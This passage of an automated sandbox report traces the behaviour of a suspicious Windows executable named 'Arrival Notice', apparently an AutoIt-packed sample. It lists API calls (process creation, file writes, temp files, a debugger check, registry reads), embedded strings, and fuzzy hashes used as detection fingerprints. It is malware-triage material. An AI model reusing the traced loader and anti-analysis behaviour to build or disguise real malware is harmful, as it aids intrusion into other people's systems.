1213->1197 1214->1197 1219 90e5af-90e5c7 call 92fc4d 1214->1219 1225 90e5c9-90e5e8 call 8d7f41 call 8d5a64 1219->1225 1226 90e5ea-90e5ed 1219->1226 1250 90e60b-90e619 call 8d5f12 1225->1250 1228 90e61b-90e61e 1226->1228 1229 90e5ef-90e60a call 8d7f41 call 8d6999 call 8d5a64 1226->1229 1231 90e620-90e629 call 92fb6e 1228->1231 1232 90e63e-90e641 call 937621 1228->1232 1229->1250 1231->1201 1244 90e62f-90e639 call 8f106c 1231->1244 1237 90e646-90e64f call 8f106c 1232->1237 1237->1197 1244->1183 1250->1237
                                              APIs
                                                • Part of subcall function 008D4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009962F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008D4F6F
                                              • _free.LIBCMT ref: 0090E68C
                                              • _free.LIBCMT ref: 0090E6D3
                                                • Part of subcall function 008D6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008D6D0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                              • API String ID: 2861923089-1757145024
                                              • Opcode ID: 7971f576260bff92e27a5b207d7c7e70f0e575f753d4cc3a2857406e9d435b5c
                                              • Instruction ID: 3acb943514eb9184b3e96c80ff158d0853392e97681444aa363808422f0be775
                                              • Opcode Fuzzy Hash: 7971f576260bff92e27a5b207d7c7e70f0e575f753d4cc3a2857406e9d435b5c
                                              • Instruction Fuzzy Hash: 46917A71910219AFCF14EFA8C8919EDB7B8FF19314F04496AF815EB2A1EB31A904CB51
                                              APIs
                                                • Part of subcall function 014C22A0: Sleep.KERNELBASE(000001F4), ref: 014C22B1
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014C24C6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: IVZM0OEL8NS77OJROJRE
                                              • API String ID: 2694422964-710978338
                                              • Opcode ID: 35e527c39a3aa43f0af6714174fa8bcdca8aa5117285a43698b09e7ba92667df
                                              • Instruction ID: 98ad075bf48677df056d7520224c67df9ae81aed1a8246bd517fae80b77d98f6
                                              • Opcode Fuzzy Hash: 35e527c39a3aa43f0af6714174fa8bcdca8aa5117285a43698b09e7ba92667df
                                              • Instruction Fuzzy Hash: 53518D74D04249EBEF11DBA4C814BEFBB79AF15700F00419DE209BB2C1DAB91B49CBA5
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008D35A1,SwapMouseButtons,00000004,?), ref: 008D35D4
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008D35A1,SwapMouseButtons,00000004,?,?,?,?,008D2754), ref: 008D35F5
                                              • RegCloseKey.KERNELBASE(00000000,?,?,008D35A1,SwapMouseButtons,00000004,?,?,?,?,008D2754), ref: 008D3617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 85c61f71104f0d5ab62ce7a26a922b24e14aba1f6e6a09d28934e92e709c11da
                                              • Instruction ID: 804764dcfcb74642737a47b672f652d955bfdd014691c4c16d3d3a2adde21946
                                              • Opcode Fuzzy Hash: 85c61f71104f0d5ab62ce7a26a922b24e14aba1f6e6a09d28934e92e709c11da
                                              • Instruction Fuzzy Hash: E2113675554208BADB218FA5EC40EAAB7A8EF15750F00466AA805E7210D2719E40A761
                                              APIs
                                                • Part of subcall function 008D5045: _fseek.LIBCMT ref: 008D505D
                                                • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AAE
                                                • Part of subcall function 009399BE: _wcscmp.LIBCMT ref: 00939AC1
                                              • _free.LIBCMT ref: 0093992C
                                              • _free.LIBCMT ref: 00939933
                                              • _free.LIBCMT ref: 0093999E
                                                • Part of subcall function 008F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008F9C64), ref: 008F2FA9
                                                • Part of subcall function 008F2F95: GetLastError.KERNEL32(00000000,?,008F9C64), ref: 008F2FBB
                                              • _free.LIBCMT ref: 009399A6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID:
                                              • API String ID: 1552873950-0
                                              • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                              • Instruction ID: df36c3426dd6e265e1db0e304713de782e3d80129478edafbc75fe112a6d8896
                                              • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                              • Instruction Fuzzy Hash: 92515EB1904618AFDF249F64DC81BAEBBB9FF48300F0004AEB209A7241DB715E80CF59
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                              • Instruction ID: 9c492d4103b7505e0a8d78f89dd2c50de655089cc70b774ca06f2060912c0b3e
                                              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                              • Instruction Fuzzy Hash: E441C57070061E9BDF188E79C88097F7BA6FF80360B24913FEA55C7650EBB09D408B44
                                              APIs
                                              • _memset.LIBCMT ref: 0090EE62
                                              • GetOpenFileNameW.COMDLG32(?), ref: 0090EEAC
                                                • Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE
                                                • Part of subcall function 008F09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F09F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: 8e71eafcd0ae34627e50d6f6b0546d80ce5f38a866af76c0b036f12ce0ebbcb1
                                              • Instruction ID: f20f1ca4db76897d5304730f72856f8ad31001cd7370065c40b3883f6c1f1a0e
                                              • Opcode Fuzzy Hash: 8e71eafcd0ae34627e50d6f6b0546d80ce5f38a866af76c0b036f12ce0ebbcb1
                                              • Instruction Fuzzy Hash: 2B21A170A1425C9BCB15AF98C845BEE7BF9EF49314F04401AE508E7381EBB459898BA2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: 178b69adbe34d62e4654bd5b7d0f7658db419c2b896f322ce68bba96d2471f67
                                              • Instruction ID: 4e3361c6787b9ef62e9d5a788e72db9a1445a7e17d5815bec52dee496958648f
                                              • Opcode Fuzzy Hash: 178b69adbe34d62e4654bd5b7d0f7658db419c2b896f322ce68bba96d2471f67
                                              • Instruction Fuzzy Hash: 6301F971914218AEDB28CAA8C81AFFE7BFCDB01311F00419AF652D2181E5B5E6048B60
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 014C1045
                                              • ExitProcess.KERNEL32(00000000), ref: 014C1064
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075623042.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_14c0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Process$CreateExit
                                              • String ID: D
                                              • API String ID: 126409537-2746444292
                                              • Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                              • Instruction ID: 547c3e8cb8f9b1d5d924af35bba46dac0961d721e8d91a578ae54143be19219a
                                              • Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                              • Instruction Fuzzy Hash: BAF0ECB564024CABDB60DFE1CC49FEE777CBF14B01F008509FB0A9A180DEB896088B61
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00939B82
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00939B99
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 85d74e82d2a72f8069bfe6d069df91298fedd41871929506f221dd923fd8f336
                                              • Instruction ID: 7d713f400a7cf7bb8ca1f1ef499c2b876f0a36edd6abc1fc81dbea6d361765be
                                              • Opcode Fuzzy Hash: 85d74e82d2a72f8069bfe6d069df91298fedd41871929506f221dd923fd8f336
                                              • Instruction Fuzzy Hash: BDD05EBA54430DABDB10ABA0DC0EF9A772CE704705F0042A1BE64961A1DEB055989B92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e2a514e78bdd931951d0de964344d7f71341d022cf2dfd8b95d665415fe981ad
                                              • Instruction ID: c426fa78a8d5c027f73e95040b127c105d4ad57b15ecfb5a54c8114e930e8d79
                                              • Opcode Fuzzy Hash: e2a514e78bdd931951d0de964344d7f71341d022cf2dfd8b95d665415fe981ad
                                              • Instruction Fuzzy Hash: 42F14875A083119FCB14DF28C480A6ABBE5FF88314F14892EF8A99B351D771E945CF82
                                              APIs
                                                • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F03D3
                                                • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008F03DB
                                                • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F03E6
                                                • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F03F1
                                                • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008F03F9
                                                • Part of subcall function 008F03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008F0401
                                                • Part of subcall function 008E6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008DFA90), ref: 008E62B4
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008DFB2D
                                              • OleInitialize.OLE32(00000000), ref: 008DFBAA
                                              • CloseHandle.KERNEL32(00000000), ref: 009149F2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: ab0852d4f05d4c9c25356c8ba59c1bf6431f9ce9a1c6b39a42e9993bd2e8ee59
                                              • Instruction ID: b27805b3a3d05d580d854c017278e4c12ab752c5308c7056fda188e9e4bb8564
                                              • Opcode Fuzzy Hash: ab0852d4f05d4c9c25356c8ba59c1bf6431f9ce9a1c6b39a42e9993bd2e8ee59
                                              • Instruction Fuzzy Hash: 9F81A8B09293408FC794EFBEE9516257BE8FB99748710862BE019C7372EB315444EF52
                                              APIs
                                              • _memset.LIBCMT ref: 008D4401
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008D44A6
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008D44C3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: 58cf4007bc612f1ff67f957c9606ea4fa9d1536cdad9934abbc8aa4c75263263
                                              • Instruction ID: 97a2ac2ca79ee2514dfde02fcc367ee9c3234bb04eca69b758c1776452713a8d
                                              • Opcode Fuzzy Hash: 58cf4007bc612f1ff67f957c9606ea4fa9d1536cdad9934abbc8aa4c75263263
                                              • Instruction Fuzzy Hash: 36314F705097018FD720DF28D88469BBBF8FB48318F000A2FE59AC2351D775A984DB96
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 008F5963
                                                • Part of subcall function 008FA3AB: __NMSG_WRITE.LIBCMT ref: 008FA3D2
                                                • Part of subcall function 008FA3AB: __NMSG_WRITE.LIBCMT ref: 008FA3DC
                                              • __NMSG_WRITE.LIBCMT ref: 008F596A
                                                • Part of subcall function 008FA408: GetModuleFileNameW.KERNEL32(00000000,009943BA,00000104,?,00000001,00000000), ref: 008FA49A
                                                • Part of subcall function 008FA408: ___crtMessageBoxW.LIBCMT ref: 008FA548
                                                • Part of subcall function 008F32DF: ___crtCorExitProcess.LIBCMT ref: 008F32E5
                                                • Part of subcall function 008F32DF: ExitProcess.KERNEL32 ref: 008F32EE
                                                • Part of subcall function 008F8D68: __getptd_noexit.LIBCMT ref: 008F8D68
                                              • RtlAllocateHeap.NTDLL(01550000,00000000,00000001,00000000,?,?,?,008F1013,?), ref: 008F598F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: 39b2f4bb82a2beb44e32d76131c3710f4c4866a8a18e0f4863e56f5effa96b28
                                              • Instruction ID: 267b43581e772eea058b6edd5e3d877e34e403b5c0fb46bd1f10c6bc069f6265
                                              • Opcode Fuzzy Hash: 39b2f4bb82a2beb44e32d76131c3710f4c4866a8a18e0f4863e56f5effa96b28
                                              • Instruction Fuzzy Hash: 2201C031304A1EEEE6293B38EC52B3E7688FF41731F50002AF704DB181DAB09D019262
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,009397D2,?,?,?,?,?,00000004), ref: 00939B45
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,009397D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00939B5B
                                              • CloseHandle.KERNEL32(00000000,?,009397D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00939B62
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: d5ad8748ad14edb44c1741664b5ff94e75cb1fd9bd41294965d1635041c41153
                                              • Instruction ID: 0b026bda8733539410518e969beec0e764b9bf90ef25af517d3b6b6320f69753
                                              • Opcode Fuzzy Hash: d5ad8748ad14edb44c1741664b5ff94e75cb1fd9bd41294965d1635041c41153
                                              • Instruction Fuzzy Hash: ACE08632195714B7E7212B55EC09FCA7B28AB05772F104120FB14A90E087B16511A798
                                              APIs
                                              • _free.LIBCMT ref: 00938FA5
                                                • Part of subcall function 008F2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008F9C64), ref: 008F2FA9
                                                • Part of subcall function 008F2F95: GetLastError.KERNEL32(00000000,?,008F9C64), ref: 008F2FBB
                                              • _free.LIBCMT ref: 00938FB6
                                              • _free.LIBCMT ref: 00938FC8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                              • Instruction ID: ad82ae1d5211528b9d835c16876d450dd44d75f72b8f842db3b389858b8bccb7
                                              • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                              • Instruction Fuzzy Hash: 79E012A16197055ACA34A57CAD44AA367FEFF48350B18081DB509DB142DE24E8418965
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: ff0ee81ee8fb02ba88da43555742d905e4b92295e41f32a7726d5a7a0d09293f
                                              • Instruction ID: cdf31fe2089048c69eade474f722ff453aa8c019f67305d46835964a9d4e9476
                                              • Opcode Fuzzy Hash: ff0ee81ee8fb02ba88da43555742d905e4b92295e41f32a7726d5a7a0d09293f
                                              • Instruction Fuzzy Hash: 71224B74608255DFCB28DF14C494B6AB7E1FF84314F158A5EE8868B362DB71ED81CB82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2075171700.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
                                              • Associated: 00000000.00000002.2075141804.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075223628.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075272392.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2075292679.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_8d0000_Arrival Notice.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: d1480dfb0bece9252020780bc119c08bdc40b0c8adbd38da152012cc6f816007
                                              • Instruction ID: 49c95feef1d8db1caec158e6706d9cc864da48a63d2e09aadaf40491cdfcfc64
                                              • Opcode Fuzzy Hash: d1480dfb0bece9252020780bc119c08bdc40b0c8adbd38da152012cc6f816007
                                              • Instruction Fuzzy Hash: 77418031A045587BDF115B68C8517BE7F66FF41324F685277E882DB382C5318D4087E2
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 008D4992
                                                • Part of subcall function 008F35AC: __lock.LIBCMT ref: 008F35B2
                                                • Part of subcall function 008F35AC: DecodePointer.KERNEL32(00000001,?,008D49A7,009281BC), ref: 008F35BE
                                                • Part of subcall function 008F35AC: EncodePointer.KERNEL32(?,?,008D49A7,009281BC), ref: 008F35C9
                                                • Part of subcall function 008D4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008D4A73
                                                • Part of subcall function 008D4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008D4A88
                                                • Part of subcall function 008D3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008D3B7A
                                                • Part of subcall function 008D3B4C: IsDebuggerPresent.KERNEL32 ref: 008D3B8C
